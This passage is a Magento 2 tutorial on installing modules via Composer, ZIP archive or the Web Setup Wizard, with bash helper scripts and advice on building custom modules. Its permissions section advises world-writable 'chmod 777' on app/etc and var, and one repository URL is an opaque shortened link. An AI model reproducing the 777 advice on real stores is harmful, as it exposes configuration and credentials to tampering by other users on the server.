A module is a logical group (that is, a directory containing blocks, controllers, helpers and models) related to a specific business feature. In keeping with Magento's commitment to optimal modularity, a module encapsulates one feature and has minimal dependencies on other modules.

Modules and themes are the units of customization in Magento. Modules provide business features, while themes strongly influence user experience and storefront appearance. Both components have a life cycle that allows them to be installed, deleted and disabled. From the perspective of both merchants and extension developers, modules are the central unit of Magento organization.

2. Purpose of a module

The purpose of a module is to provide specific product features by implementing new functionality or extending the functionality of other modules. Each module is designed to function independently, so including or excluding a particular module does not typically affect the functionality of other modules.

B. Installing the existing Magento Modules

Magento 2 lets you install modules manually in 3 different ways: via Composer, from a ZIP archive, or through the browser. Which method to use depends on where the module comes from. Let's look at each of them in detail.

A module can come from one of two places:

The Magento Marketplace. You get 2 access keys, generated in your Marketplace account.

You can add these keys to the Magento Admin panel. Your Marketplace account then synchronizes with it, and you can manage the installation of any purchased packages there.

If you are an advanced user and can use the server console, you can install a module via Composer. You will also need to enter the keys if they were not previously saved in the system.

Third-party sources. In this case you either:

Get the module in the form of an archive, or

Receive a link to a third-party repository, e.g. GitHub. Installation from it can also be done via Composer.

Now let’s take a closer look at each method of module installation.

1. Generating “Access Keys” in a Magento account

Log in to (or create) an account at magento.com, then click the “Marketplace” link in your account.

Or go directly to the Magento extensions store.

In “My Profile”, find the “My Products / Access Keys” section and generate the keys you need.
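Once generated, the keys can also be stored for Composer, so you are not prompted for them on every install. The public key acts as the username and the private key as the password for repo.magento.com. The sketch below assumes a globally installed composer and uses Composer's own config command. save_marketplace_keys is a hypothetical helper name.

```bash
#!/usr/bin/env bash
# Hypothetical helper: save_marketplace_keys <public_key> <private_key>
# Stores Marketplace access keys in Composer's global auth.json:
# public key = username, private key = password for repo.magento.com.
save_marketplace_keys() {
  local public_key="$1" private_key="$2"
  if [ -z "$public_key" ] || [ -z "$private_key" ]; then
    echo "usage: save_marketplace_keys <public_key> <private_key>" >&2
    return 1
  fi
  composer config --global http-basic.repo.magento.com "$public_key" "$private_key"
}
```

Keys passed as arguments end up in your shell history. If that is a concern, skip this step and enter the keys when Composer prompts for them.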

2. Installing modules via Composer

This method is for you if you are comfortable using the server console.

Composer is distributed as a file called composer.phar, which you can download from getcomposer.org. Run it from the Magento root directory. That directory should contain the composer.json file with the configuration of the installed libraries.

php composer.phar <command>

If Composer is installed globally on the server, you don't need to download it and can call it directly:

composer <command>

If the module is distributed from the Magento repository, we can just run the following commands:

php composer.phar require [vendor]/[package]

php bin/magento setup:upgrade

And they will do the rest of the job.
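The two invocation forms above can be wrapped in a small shell sketch. run_composer prefers a global composer and falls back to php composer.phar in the current (Magento root) directory. install_package then runs the two commands shown. Both function names are hypothetical, and the script assumes it is run from the Magento root.

```bash
#!/usr/bin/env bash
# Hypothetical helpers; run from the Magento root directory.

# run_composer <args...>: use a global `composer` if one is available,
# otherwise fall back to composer.phar in the current directory.
run_composer() {
  if command -v composer >/dev/null 2>&1; then
    composer "$@"
  else
    php composer.phar "$@"
  fi
}

# install_package <vendor/package>: require the package, then let Magento
# install or upgrade module schemas and data.
install_package() {
  local package="$1"
  run_composer require "$package" || return 1
  php bin/magento setup:upgrade
}
```

Call it as install_package [vendor]/[package], substituting the real package name of the module you purchased.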

If the module comes from a third-party repository, we need to declare it in the composer.json file.

We are interested in the “require” section, where we specify the name of the module we are adding.

{
    ...
    "require": {
        ...
        "vendor/package": "version"
    },
    ...
}

If the third-party repository is, for example, GitHub, you also need to declare it in the “repositories” section.

{
    ...
    "repositories": [
        ...
        {
            "type": "git",
            "url": "https://github.com/ . . . . ."
        }
    ],
    ...
}

Usually, all this data is provided with the module.

Next, after saving the file, run the following commands:

php composer.phar update [vendor]/[package]

php bin/magento setup:upgrade

For example, let's look at installing one of our free modules, which is hosted in a GitHub repository. Since the module is not installed from the Magento repository, we add it to the composer.json file.

{
    ...
    "repositories": [
        ...
        {
            "type": "vcs",
            "url": "https://ift.tt/2w7nQUw"
        }
    ],
    ...
}

Then add the module to the “require” section:

{
    ...
    "require": {
        ...
        "belvg/module-applyto": "dev-master"
    }
}

All that remains is to run the update. Composer downloads the required modules and their dependencies according to the changes made to the composer.json file.

php composer.phar update

Then start the installation of all the new modules in Magento.

php bin/magento setup:upgrade
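Editing composer.json by hand works, but Composer can make the same two changes from the command line with composer config and composer require. Note also that a bare composer update moves every dependency to the newest version its constraints allow. composer require (or composer update [vendor]/[package]) limits the change to the named package. The sketch below assumes a global composer. install_from_vcs and its arguments are hypothetical.

```bash
#!/usr/bin/env bash
# Hypothetical helper: install_from_vcs <repo_name> <repo_url> <vendor/package> <constraint>
# Adds a "vcs" entry under "repositories" and the package under "require"
# (the same edits as above), then runs setup:upgrade from the Magento root.
install_from_vcs() {
  local repo_name="$1" repo_url="$2" package="$3" constraint="$4"
  composer config "repositories.$repo_name" vcs "$repo_url" || return 1
  composer require "$package:$constraint" || return 1
  php bin/magento setup:upgrade
}
```

For the module above, the call would be install_from_vcs applyto, followed by the repository URL supplied with the module, then belvg/module-applyto dev-master.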

3. Installing modules via ZIP-archive

To add an extension to Magento 2 from a ZIP archive, first copy its code to the required directory.

(Screenshot: the left panel lists the contents of the module's ZIP file; the right panel shows the Magento 2 codebase.)

This ZIP file contains a User_Guide.pdf file and an Install directory. The contents of the Install folder should be copied to the app/code/ directory.

After that, the module can be initialized in the store in one of two ways: through the browser or from the console.
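The copy step followed by the console route can be sketched in shell. The sketch makes three assumptions:
- the archive has the layout described above: an Install/ folder whose contents mirror app/code, e.g. Install/Vendor/Module/...;
- unzip is available;
- you know the module's name in Vendor_Module form, which is declared in the module's etc/module.xml.

install_from_zip is a hypothetical name.

```bash
#!/usr/bin/env bash
# Hypothetical helper: install_from_zip <archive.zip> <magento_root> <Vendor_Module>
install_from_zip() {
  local zip="$1" magento_root="$2" module_name="$3" tmp
  tmp="$(mktemp -d)" || return 1

  # Unpack into a scratch directory so files like User_Guide.pdf stay out of the codebase.
  if ! unzip -q "$zip" -d "$tmp"; then
    rm -rf "$tmp"; return 1
  fi

  # Copy the contents of Install/ (note the trailing "/.") into app/code/.
  mkdir -p "$magento_root/app/code"
  if ! cp -R "$tmp/Install/." "$magento_root/app/code/"; then
    rm -rf "$tmp"; return 1
  fi
  rm -rf "$tmp"

  # Enable the module and run the schema/data upgrade from the Magento root.
  ( cd "$magento_root" && php bin/magento module:enable "$module_name" && php bin/magento setup:upgrade )
}
```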

4. Installing modules via a browser

This method requires Magento's cron jobs to be set up and running properly. If you haven't set them up yet, do it now: Magento needs cron for much more than installing extensions.
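On Magento 2.2 and later, the cron jobs can be installed from the console with bin/magento cron:install, which writes Magento's entries into the current user's crontab. The sketch below (ensure_magento_cron is a hypothetical name) installs them only when they are missing. It assumes the entries can be recognized by the MAGENTO START marker line that cron:install writes, so adjust the check if your crontab looks different. Run it as the file-system owner rather than root.

```bash
#!/usr/bin/env bash
# Hypothetical helpers. Assumes cron:install wraps its entries in
# "#~ MAGENTO START ..." / "#~ MAGENTO END ..." marker lines.
has_magento_cron() {
  crontab -l 2>/dev/null | grep -q 'MAGENTO START'
}

# ensure_magento_cron <magento_root>
ensure_magento_cron() {
  local magento_root="$1"
  if has_magento_cron; then
    echo "Magento cron already installed"
    return 0
  fi
  ( cd "$magento_root" && php bin/magento cron:install ) || return 1
  has_magento_cron   # succeeds only if the entries are now present
}
```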

If cron is set up correctly, follow this path in the admin panel to initialize the module (the Web Setup Wizard is available only up to Magento 2.3; it was removed in Magento 2.4):

System > Web Setup Wizard > Component Manager

Here you can enable all available modules.

If Magento is set up properly, you'll see a notification that all systems are running correctly.

Next, before the custom module is enabled, Magento offers to create a backup.

Finally, a confirmation screen shows that the module has been enabled. You can then switch back to the module list and enable (install) the next one.

Console commands in Magento

You have already met one of them:

php bin/magento <command>

The Magento CLI provides many useful console commands for managing the store. You can list them by running: php bin/magento.

For installing modules, we only need one:

php bin/magento setup:upgrade

This command checks all modules and runs the schema installation or upgrade process where necessary. A single command therefore installs and updates all modules.
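Since setup:upgrade covers installing and upgrading every module, a typical console session is just that command plus a status check. Here is a minimal sketch. It assumes it runs from the Magento root and that your release's module:status accepts module names as arguments, as recent 2.x releases do. On older releases, run module:status without arguments and look for the module in the list. upgrade_and_check is a hypothetical name.

```bash
#!/usr/bin/env bash
# Hypothetical helper: upgrade_and_check <Vendor_Module>
# Run from the Magento root directory.
upgrade_and_check() {
  local module_name="$1"
  php bin/magento setup:upgrade || return 1
  # Reports whether the given module is enabled or disabled.
  php bin/magento module:status "$module_name"
}
```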

File permissions

For greater security (or for other reasons), the server may be configured so that modules must be installed by a specific user.

In this case, when executing console commands:

php composer.phar <command>

php bin/magento <command>

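you may see errors about insufficient permissions.

You can try running the same commands as another user, or as the administrator (root). Running them as the file-system owner is usually preferable, because files created by root may not be writable by the web server afterwards. For example: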

sudo -u <username> php bin/magento <command>

or simply

sudo php bin/magento <command>

You may also need broader permissions on some folders. For example, when installing modules, you may lack access to some files in the app/etc directory.

chmod 777 app/etc

chmod 644 app/etc/*.xml

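The same applies to the var folder, which contains many temporary files and whose permissions must be applied to all subdirectories (the -R flag makes chmod recursive). Keep in mind that 777 makes files writable by every user on the server, so use it only as a temporary measure.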

chmod -R 777 var/
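Magento's installation guide recommends a narrower alternative to 777. Instead of opening the writable directories to everyone, make them group-writable for a group shared by the file-system owner and the web server user. Here is a sketch of that approach. It assumes such a shared group already owns the files, typically set as root with chown -R :<web server group> . in the Magento root. set_magento_permissions is a hypothetical name.

```bash
#!/usr/bin/env bash
# Hypothetical helper: set_magento_permissions <magento_root>
# Files get g+w, directories g+ws (setgid keeps new files in the shared group),
# and bin/magento becomes executable by its owner.
set_magento_permissions() {
  local root="$1" d
  for d in var generated vendor pub/static pub/media app/etc; do
    [ -d "$root/$d" ] || continue   # skip directories that don't exist yet
    find "$root/$d" -type f -exec chmod g+w {} +
    find "$root/$d" -type d -exec chmod g+ws {} +
  done
  if [ -f "$root/bin/magento" ]; then
    chmod u+x "$root/bin/magento"
  fi
}
```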

C. Creating new Magento Modules

1. Things to remember when creating a Magento module

Be aware of hidden complexity

Adding custom attributes to Magento 2 may look quick, but it can involve considerably more development than expected. Unless you have already implemented custom attributes on earlier projects, your estimate is likely to be inaccurate.

What we recommend here is spending time researching and planning development tasks to achieve an accurate estimate.

Follow the versioning policy

Make sure to follow the versioning policy in your custom Magento 2 module. This keeps the module stable and robust when Magento releases a new version.

Additionally, the Composer package manager helps you specify and maintain explicit dependencies on other packages and Magento 2 modules.

(Figure: an example composer.json with Magento 2 module dependencies.)

Dependencies on other Magento 2 modules play an important role. Suppose, for example, that a custom module's composer.json declares a 100.1.* version dependency on the magento/module-catalog module. That means all PATCH updates are compatible with the custom module.

In practice, many modules lack a clear API or full API coverage, and you will end up with a pinned 100.1.3 dependency. Such modules most likely use inheritance rather than composition.
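As an illustration of these dependency rules, here is a sketch that writes a composer.json for a hypothetical Acme_HelloWorld module. The package name and the 100.1.* constraints are placeholders based on the example in the text; use the versions of the modules you actually depend on. A wildcard constraint such as 100.1.* accepts 100.1.0, 100.1.3, or any later 100.1.x patch release, but not 100.2.0. A pinned 100.1.3 accepts only that exact version.

```bash
#!/usr/bin/env bash
# Hypothetical helper: write_module_composer_json <module_dir>
# Writes a composer.json that declares each Magento package the code uses.
write_module_composer_json() {
  local dir="$1"
  # Quoted 'EOF': the heredoc is written verbatim (no $ or \ processing).
  cat > "$dir/composer.json" <<'EOF'
{
    "name": "acme/module-hello-world",
    "description": "Example Magento 2 module",
    "type": "magento2-module",
    "require": {
        "magento/framework": "100.1.*",
        "magento/module-catalog": "100.1.*"
    },
    "autoload": {
        "files": ["registration.php"],
        "psr-4": {
            "Acme\\HelloWorld\\": ""
        }
    }
}
EOF
}
```

Running composer validate in the module directory afterwards will flag structural problems in the file.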

Follow the Magento 2 core wisely

Many Magento developers may say: “It is the same approach as in the Magento 2 core, and I followed (read: copy-pasted) the same approach, so it should be correct.” Following Magento 2 core implementations is reasonable. However, large parts of the core code are still scheduled for refactoring and reimplementation by the Magento team.

For example, you might look to the Magento\Payment module for a comparable implementation when building a custom payment integration. In that module, you will find an AbstractMethod class and examples of its use in the payment modules that ship with Magento 2 Community Edition. Interestingly, this way of implementing payment integrations in Magento 2 follows exactly the same approach as Magento 1, which is deprecated.

Most importantly, AbstractMethod is marked as @deprecated and shouldn't be used. Instead, there is a Payment Gateway API, where all parts or components can be implemented independently of one another. The main thing you need to ensure is that these payment components are configured properly via the di.xml configuration file.

The Magento documentation (DevDocs) is a good starting point if you are not familiar with the architecture or best practices of Magento 2 development.

Provide localization support

Before you decide that a module is ready to be released to Magento Marketplace or to GitHub for the community, make sure it includes localization support.

All texts in a custom module should be wrapped with the __('My Text') function. It should be used everywhere: classes, templates, JavaScript components, email templates, and so on.
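Once texts are wrapped this way, Magento's i18n tooling can collect them into a translation dictionary. The sketch below calls bin/magento i18n:collect-phrases on the module directory and writes the phrases to the module's i18n/<locale>.csv file, which can then be translated. The function name and the default en_US locale are assumptions for illustration.

```bash
#!/usr/bin/env bash
# Hypothetical helper: collect_module_phrases <magento_root> <module_dir> [locale]
# module_dir is relative to the Magento root, e.g. app/code/Acme/HelloWorld.
collect_module_phrases() {
  local magento_root="$1" module_dir="$2" locale="${3:-en_US}"
  mkdir -p "$magento_root/$module_dir/i18n" || return 1
  # -o sets the output CSV; the last argument is the directory to scan.
  ( cd "$magento_root" && php bin/magento i18n:collect-phrases -o "$module_dir/i18n/$locale.csv" "$module_dir" )
}
```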

Use a composer.json file

The importance of the composer.json file is easy to underestimate. Every Magento module, package, theme, and language package should include a composer.json file listing all of its dependencies. Many Magento 2 modules list just one dependency, “magento/framework”. Depending only on the framework is a mistake if, for example, your module uses Magento\Catalog\Api interfaces from the “magento/module-catalog” package.
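A rough way to catch this mistake is to compare the Magento namespaces a module's PHP code references with the packages listed in its composer.json. The sketch below assumes Magento's usual naming convention: Magento\Framework maps to magento/framework, and Magento\CatalogInventory maps to magento/module-catalog-inventory. It only looks for literal Magento\<Name> strings, so treat its output as a hint rather than a complete dependency analysis. missing_magento_deps is a hypothetical name.

```bash
#!/usr/bin/env bash
# Hypothetical helper: missing_magento_deps <module_dir>
# Prints Magento packages referenced in *.php files but absent from composer.json.
missing_magento_deps() {
  local module_dir="$1" ns pkg
  grep -rhoE --include='*.php' 'Magento\\[A-Z][A-Za-z0-9]*' "$module_dir" \
    | sed 's/^Magento\\//' \
    | sort -u \
    | while read -r ns; do
        if [ "$ns" = "Framework" ]; then
          pkg="magento/framework"
        else
          # CamelCase -> kebab-case: CatalogInventory -> catalog-inventory
          pkg="magento/module-$(printf '%s' "$ns" | sed -E 's/([a-z0-9])([A-Z])/\1-\2/g' | tr '[:upper:]' '[:lower:]')"
        fi
        grep -q "\"$pkg\"" "$module_dir/composer.json" || echo "$pkg"
      done
}
```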

Also, the Magento 1 approach was to create a special class holding every utility function or method. Sometimes these methods were related to one another, but in most cases such a class carried too many responsibilities. This class is also known as a Helper.

First of all, avoid Helpers in Magento 2, both as a term and as a do-everything “God” class. It is always better to create five smaller classes with clear names and purposes than a single Helper.php.

For example, suppose you have an Attribute Helper class with two responsibilities: a) merging attribute values and b) mapping attribute values. Consider splitting it into two independent classes, each with its own responsibility:

AttributeMerger

AttributeMapper

Main menu usage

Every time you install a Magento module with Magento Admin functionality, you may notice that a new menu icon is added to the left main menu.

There is a misleading assumption that if a merchant installs “my” module, it provides the main and most-used functions and should therefore be listed in the main menu.

In 99% of cases, a custom module requires configuration settings, and for this Magento provides a dedicated page under Magento Admin > Stores > Configuration. So if your module helps the merchant increase conversion, “Marketing” is most likely a good name for the configuration section. If the custom module modifies existing functionality, its settings should be part of the existing configuration section.

Test the module in different deployment modes

It is always good practice to switch between production and developer application modes to make sure the custom module doesn't break any existing functionality. According to the latest report by the Magento Marketplace team, 70% of modules fail to compile in production mode.

Take the time to test in production mode before releasing the module to Magento Marketplace or anywhere else. The Magento ecosystem needs reliable and stable modules.
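Switching modes is done from the console. In Magento 2, deploy:mode:set production also compiles dependency injection code and deploys static content, so a module that fails to compile in production mode typically fails at this step. The sketch below (check_production_mode is a hypothetical name) reports the current mode, tries production, and then switches back to developer mode. It assumes it runs against a development or staging copy of the store, not a live one, and that developer is the mode you want to return to.

```bash
#!/usr/bin/env bash
# Hypothetical helper: check_production_mode <magento_root>
# Returns non-zero if switching to production mode (DI compile + static deploy) fails.
check_production_mode() {
  local magento="$1/bin/magento" status=0
  php "$magento" deploy:mode:show
  if php "$magento" deploy:mode:set production; then
    echo "production build OK"
  else
    echo "production build FAILED" >&2
    status=1
  fi
  # Return to developer mode for further work.
  php "$magento" deploy:mode:set developer
  return "$status"
}
```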

Testing is as important as code

Consider including various kinds of tests when building a custom module for Magento 2. Magento 2 currently includes several test types, such as unit tests, integration tests, and functional tests.

Writing tests will undoubtedly increase the initial effort estimate, but maintenance costs will be lower. New features can be added much faster, with a good degree of confidence that existing ones still work as intended.
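As a starting point for unit tests, Magento 2 ships a PHPUnit configuration at dev/tests/unit/phpunit.xml.dist, and modules conventionally keep their unit tests under Test/Unit. Here is a minimal sketch for running one module's unit tests from the Magento root. It assumes PHPUnit was installed by Composer at vendor/bin/phpunit, which can be overridden with the PHPUNIT variable. The function name is hypothetical.

```bash
#!/usr/bin/env bash
# Hypothetical helper: run_module_unit_tests <magento_root> <Vendor> <Module>
run_module_unit_tests() {
  local magento_root="$1" vendor="$2" module="$3"
  local phpunit="${PHPUNIT:-vendor/bin/phpunit}"
  # -c points PHPUnit at Magento's unit-test configuration; the last argument
  # limits the run to this module's Test/Unit directory.
  ( cd "$magento_root" && "$phpunit" -c dev/tests/unit/phpunit.xml.dist "app/code/$vendor/$module/Test/Unit" )
}
```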

Code Review

Whether you work in a team or on your own, show your code to other developers and ask them to review it. It doesn't matter whether you are a Senior Developer who knows absolutely everything or a Junior Developer who has just started: the importance of code review can't be overestimated.

One small typo in code can lead to site downtime and a large revenue drop for a merchant. A peer review can produce a better and cleaner version of the code.

Granularity Matters